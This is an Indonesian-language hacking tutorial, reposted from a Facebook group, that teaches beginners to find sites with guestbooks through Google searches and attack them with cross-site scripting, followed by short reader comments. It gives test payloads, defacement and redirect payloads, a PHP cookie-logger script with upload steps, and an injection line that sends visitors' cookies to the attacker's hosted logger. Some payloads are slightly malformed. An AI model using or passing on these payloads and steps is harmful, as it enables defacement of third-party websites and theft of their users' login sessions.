Pertama yang perlu di ketahui adalah penggunaan testing form contoh adalah dengan menggunakan tag h1 atau script alert yang akan di jelaskan di bawah :
Code :
<h1>Contoh kata yang ingin anda pakai</h1>
masukan di form “search” atau kotak pencarian website, jika website tersebut vulnerabel terhadap xss maka akan keluar hasil pencarian , misal
<h1>Tag h1 for xss and html injection</h1>
hasilnya seperti di bawah ini :
Penjelasan :Tag h1 adalah sebuah tag untuk mengatur teks menjadi ekstra besar, jika kita memasukan tag tersebut ke dalam sebuah halaman html, maka karakter yang ada di dalam tag tersebut akan di tambilkan dengan ukuran yang lebih besar dari ukuran font normal, dalam kasus ini jika kotak pencarian dalam sebuah website telah tersanitasi dengan benar, maka ketika kita memasukan teks <h1>cari</h1> maka hasil yang muncul adalah semacam ini ”
<h1>Cari</h1>
noresult found!!!
namun jika situs tersebut memiliki bug atau tidak tersanitasi pemrogrammannya dengan benar, maka hasil yang muncul adalah
Cari
no result found!!!
( kata “cari” yang anda masukan ke dalam tag h1 tadi akan di eksekusi menjadi ukuran besar )
Lantas kenapa itu di sebut kelemahan / kerentanan ? yup, bayangkan saja jika satu jenis script yang kecil itu di anggap sebagai perintah oleh program pencarian situs, apalagi script yang lebih kompleks ? misalnya redirect url, payload virus, deface script dan lain sebagainya, kalau satu jenis tag bisa di eksekusi, bukan tidak mungkin jenis-jenis tag yang lain juga di eksekusi, itu menyebabkan web yang vuln xss bisa di acak-acak dan di ubah tampilanya oleh hacker dan cracker ^_^
Contoh testing lainnya :
oke, sekian penjelasan dari saya, selanjutnya ikuti tutorial lengkapnya di bawah ini :
Di salin dari notes group facebook “Share Your Code” Tanpa perubahan sebagai wujud penghormatan dari penulis, “Angger Hacktivis”
Tutorial ini ditujukan untuk para pemula yang ingin mengerti secara mendasar apa yang dinamakan XSS ,atau cross (x) site scripting, dan bagaimana mencari website dan memanfaatkan kelemahan sebuah situs yang mempunyai lubang XSS ini,baca tutorial ini sampai habis maka secara basic kalian akan mengerti bagaimana XSS bekerja dan selanjutnya kalian bisa mengembangkan nya sendiri
Apa itu XSS?
XSS adalan cross site Scripting ,jangan sampai tertukar dengan CSS,jika kalian mengenal HTML mungkin kalian mengenal CSS yang kepanjangan dari Cascading style Sheets ,file CSS yang berisi format untuk mengatur tampilan dalam sebuah situs.berbeda dengan XSS ,XSS adalah teknik memasukan atau istilah nya men-injeksi code-code HTML kedalam sebuah situs yang memiliki kelamahan ini,setelah Situs yang memiliki kelemahan ini ditemukan,seorang hacker bisa memasukan code-code yang di masukan lewat Text field,seperti Guestbook,shoutbox,bahkan Form login. serangan XSS bisa berupa defacement (mengganti sebagian atau seluruhnya halaman depan situs),malicious code, dan Cookieloggers.
Bagaimana cara kita menemukan situs yang memiliki kelemahan XSS atau istilah nya yang vulnerable?
dari google kita bisa mencari situs yang memiliki guestbook,sebagian situs yang memiliki guestbook bisa kita sisipi dengan code yang kalau kita enter bisa di jalankan situs tersebut.
masukan kata kunci sebagai berikut di hamalan google dan mulai mencari:
inurl:.com/guestbook
atau tanpa inurl pun gpp,..arti perintah di atas artinya kita mencari halaman website yang memiliki alamat .com/guestbook
setelah keluar hasil pencarian lalu mulai pilih satu website dan mulai ke step berikut nya
Bagaimana cara mengetes suatu situs yang meiliki kelemahan XSS?
untuk me-ngetes situs tersebut vulnerable atau tidak kita masukan code pop-up window di bagian text field nya,bisa di bagian guestbook ,atau di kotak search situs tersebut ,atau dimanapun yang bisa kita masukan text(text field)
masukan code berikut :
Code:
<script>alert(“/XSS”/)</script>
<script>alert(“XSS”)</script>
<script>alert(“XSS”)</script>;
<script>alert(String.fromCharCode(88,83,83))</script>
<body onload=alert(‘XSS’)>
<script type=text/javascript>alert(“XSS”)</script>
kalau setelah di enter keluar pop up dan berisi tulisan “XSS” maka situs tersebut bisa kita serang dengan XSS menggunakan code2 yang lebih merusak. Banyak sekali code-code yang bisa kita sisipi dibawah ini adalah beberapa di antaranya.
Bagaimana cara nge-exploit situs yang memiliki vulnerable XSS?
selanjutnya setelah di tes memiliki kelemahan
kalian bisa melakukan beberapa hacking attempt berikut :
Defacement
di situs yang memiliki kelemahan XSS ,kamu bisa menjalankan hampir semua perintah code html atau javascript yang disisipkan kedalam text field seperti guestbook .masukan code ke dalam kotak username (karena beberapa situs mem-block bagian comment atau message untuk bisa menjalankan javascript dan html).jika guuestbook harus menyertakan image verification/captcha sertakan saja atau isi saja captcha nya,kalau diminta isikan email ,isikan email palsu .lalu submit atau enter
beberapa daftar serangan dan apa yang bisa kalian lakukan
Memasang Gambar kamu sebagai defacement
Code:
<html><body></body></html>
Redirect ke gambar kamu
Code:
<meta http-equiv=”refresh” content=”0;url=http://www.tinypic.com/deface.png” />
Pop-up gambar kamu
Code:
<script>window.open( “http://www.tinypic.com/deface.png” )</script>
Menambahkan video atau flash
Code:
<EMBED SRC=”http://website.com/deface.swf”
Menambahkan music
Code:
http://www.musicsite.com/Downloads/lol.mp3
Mencuri cookies
Code:
<script>alert(document.cookie)</script>
jika kamu sisipkan code di atas di text field suatu situs (termasuk Search bar), kamu bisa mencuri login information dari situs tersebut.namun kamu harus memiliki cookie editor untuk bisa menggunakan cookie yang tercuri,kamu bisa mendapatkan cookie editor
atau alternatif lain kamu bisa membuat cookie logger
Code:
<?php
$cookie = $_GET[‘cookie’];
$log = fopen(“cookies.txt”, “a”);
fwrite($log, $cookie .”n”);
fclose($log);
?>
tulis code tersebut dalam sebuah file dan beri extention .php,caranya buka notepad lalu copy paste code tersebut dan save dengan nama cookielogger lalu diberi extention .php bukan .txt,menjadi cookielogger.php
lalu buat file lagi menggunakan notepad dan beri nama cookies.txt dan biarkan kosong (file ini untuk hasil cookie dimana hasil tersebut akan tertulis difile ini)
upload kedua file tersebut di media hosting yang support php seperti ripway.com,000webhost.com dll,dalam satu folder
lalu sisipkan code ini dalam situs yang memiliki kelemahan XSS
Code:
<script>alert(namalogin.namamediahostingkamu.com/cookielogger.php)</script>
atau
Code:
<script>document.location=’namalogin.namamediahostingkamu.com/cookielogger.php?
cookie=’+escape(document.cookie) </script>
setelah memasukan code tersebut cookie akan tertulis di dalam cookies.txt kalian yang telah di hosting di media host kalian, log in ke media host lalu buka cookies.txt nya
Sumber: http://xfile-cmd.blogspot.com/2011/06/cara-melakukan-xss-injection.html
mangstab bang, informasi yang sangat konkrit, bisa di pelajari 😀
ya. itu menjelaskan kejadian di blog kam kemaren.. hehehe
perlu ditindak lanjuti… 😀
betul betul betul